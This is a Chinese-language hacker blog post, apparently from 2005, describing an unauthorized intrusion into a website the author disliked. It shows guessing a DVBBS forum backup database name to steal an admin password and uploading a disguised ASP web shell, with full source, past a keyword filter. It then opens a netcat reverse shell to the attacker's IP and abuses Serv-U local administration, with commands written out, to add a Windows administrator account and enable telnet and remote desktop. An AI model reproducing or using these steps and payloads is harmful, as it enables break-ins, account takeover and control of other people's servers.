今天終于GK完了
無聊閑逛在網(wǎng)上，意識催魂試的找我要文章...
哈~發(fā)現(xiàn)一迷信網(wǎng)站，不爽...
（入侵需要理由嗎？不需要嗎？需要嗎？....） 用
telnet www.xxx.com 80 get enter HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jun 2005 11:56:00 GMT
Content-Type: text/html
Content-Length: 87 <html><head><title>Error</title></he
</html> 失去了跟主機的連接。 F:\Documents and Settings\lu\桌面> 看到?jīng)]，獲得很多有用的信息哦 先去WEB上看看有沒有什么漏洞 哈！發(fā)現(xiàn)DVBBS7.1 論壇 前幾天有朋友告訴我件事情，說有許多白癡管理員用備分的日期做備分數(shù)據(jù)庫的名字哦！試試看！ dvbbs7.1 是4月6日更新的，他用該用200504**.mdb做名字來命名以前的舊數(shù)據(jù)庫！
沒辦法，試試！ http://www.xxxx.com/bbs/databackup/20050406.mdb
http://www.xxxx.com/bbs/databackup/20050407.mdb
http://www.xxxx.com/bbs/databackup/20050408.mdb
.....
暈..到32了還沒出來
管理員不是白癡哦！
http://www.xxxx.com/bbs/databackup/200504.mdb
faint!他不是白癡誰是！
跳出了可愛的下載對話框！ downloading.... 完成！ 用輔臣數(shù)據(jù)庫瀏覽器打開，選擇Dv_Log(2586)
字段名選擇l_content 關(guān)鍵字添password2 點查詢
許多信息出來了哦！
經(jīng)過篩選
發(fā)現(xiàn)一條：
oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更 新 哈，想到什么了？登陸啊，不過用戶名不知道，是葛飛嗎~開玩笑，那簡單，其實轉(zhuǎn)化這個我用他本身的頁面，
在登陸頁面上用戶名和密碼亂添
點登陸
http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填寫登錄信息 填寫登錄信息這句話意思是“填寫登錄信息” 那么就把填寫登錄信息換成叼防！ 提交！看到了吧！用戶名是“叼防”
暈！
什么名字啊！不管了，登陸！
成功！呵呵~把老兵的asp站長助手另存為admin_system321.gif 上傳！ 暈！ 一流信息監(jiān)控系統(tǒng)提醒您：很抱歉，由于您提交的內(nèi)容中或訪問的內(nèi)容中含有系統(tǒng)不允許的關(guān)鍵詞或者您的IP受到了訪問限制，本次操作無效，系統(tǒng)已記錄您的IP及您提交的所有數(shù)據(jù)。請注意，不要提交任何違反國家規(guī)定的內(nèi)容！本次攔截的相關(guān)信息為：drop table 換海陽top的傳，在暈...還是被攔截！ 不行！我就不信上不去！ <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="/cmd.exe"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="cmd"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="cmd.exe" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea> 保存成為cmd.gif
上傳成功！
登陸后臺用數(shù)據(jù)庫管理還原成根目錄下的admin_system321.asp _system321.asp">http://www.xxx.com/bbs/admin_system321.asp 登陸，啊...CMD窗口那里顯示 無法找到該頁
您正在搜索的頁面可能已經(jīng)刪除、更名或暫時不可用。
-------------------------------------------------------------------------------- 請嘗試以下操作： 確保瀏覽器的地址欄中顯示的網(wǎng)站地址的拼寫和格式正確無誤。
如果通過單擊鏈接而到達了該網(wǎng)頁，請與網(wǎng)站管理員聯(lián)系，通知他們該鏈接的格式不正確。
單擊后退按鈕嘗試另一個鏈接。
HTTP 錯誤 404 - 文件或目錄未找到。
Internet 信息服務(wù) (IIS) -------------------------------------------------------------------------------- 技術(shù)信息（為技術(shù)支持人員提供） 轉(zhuǎn)到 Microsoft 產(chǎn)品支持服務(wù)并搜索包括“HTTP”和“404”的標題。
打開“IIS 幫助”（可在 IIS 管理器 (inetmgr) 中訪問），然后搜索標題為“網(wǎng)站設(shè)置”、“常規(guī)管理任務(wù)”和“關(guān)于自定義錯誤消息”的主題。 把我的SYSTEM32下的CMD.exe用記事本打開，另存為111.gif上傳！
在用剛才的方法備分成跟目錄下的cmd.exe 把剛才cmd.gif里cmd.exe改成他的絕對路徑 全都上傳！然后備分！
訪問_system321.asp">http://www.xxx.com/bbs/admin_system321.asp
哈！成功！
在用上面的方法把nc傳上去！
本地命令提示符執(zhí)行 nc -vv -l -p 9999
在webshell里執(zhí)行nc.exe -e cmd.exe 自己IP 9999
NC監(jiān)聽的窗口就出現(xiàn)一個可愛的SHELL 在寫個文件如下 echo USER LocalAdministrator>2.txt
echo PASS #l@$ak#.lk;0@P>>2.txt
echo SITE MAINTENANCE>>2.txt
echo -setdomain>>2.txt
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt
echo -DynDNSEnable=0 >>2.txt
echo DynIPName=>>2.txt
echo -SETUSERSETUP>>2.txt
echo -IP=0.0.0.0>>2.txt
echo -PortNo=22>>2.txt
echo -User=tyrant>>2.txt
echo -Password=19851011>>2.txt
echo -HomeDir=c:\>>2.txt
echo -Maintenance=System>>2.txt
echo -Ratios=None>>2.txt
echo Access=c:\^|RWAMEICDP>>2.txt
echo -GETUSERSETUP>>2.txt "^"符號的作用相信大家都了解吧！我不羅嗦了。 把上面批處理保存為1.txt 在SHELL中用NC提交 nc 127.0.0.1 43958 <1.txt 回顯發(fā)現(xiàn) 220 Domain settings saved
200-User=test1
200 User settings saved 成功了！成功添加了用戶tyrant密碼19851011 登陸對方的ftp
轉(zhuǎn)到system32文件夾下 quote site exec "net.exe user tyrant 19851011 /add" quote site exec "net.exe localgroup administrators tyrant /add" quote site exec "net.exe user start telnet" 用tyrant管理員telnet上去
傳個批處理開3389 哈...正在連接到... 文章到此結(jié)束

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。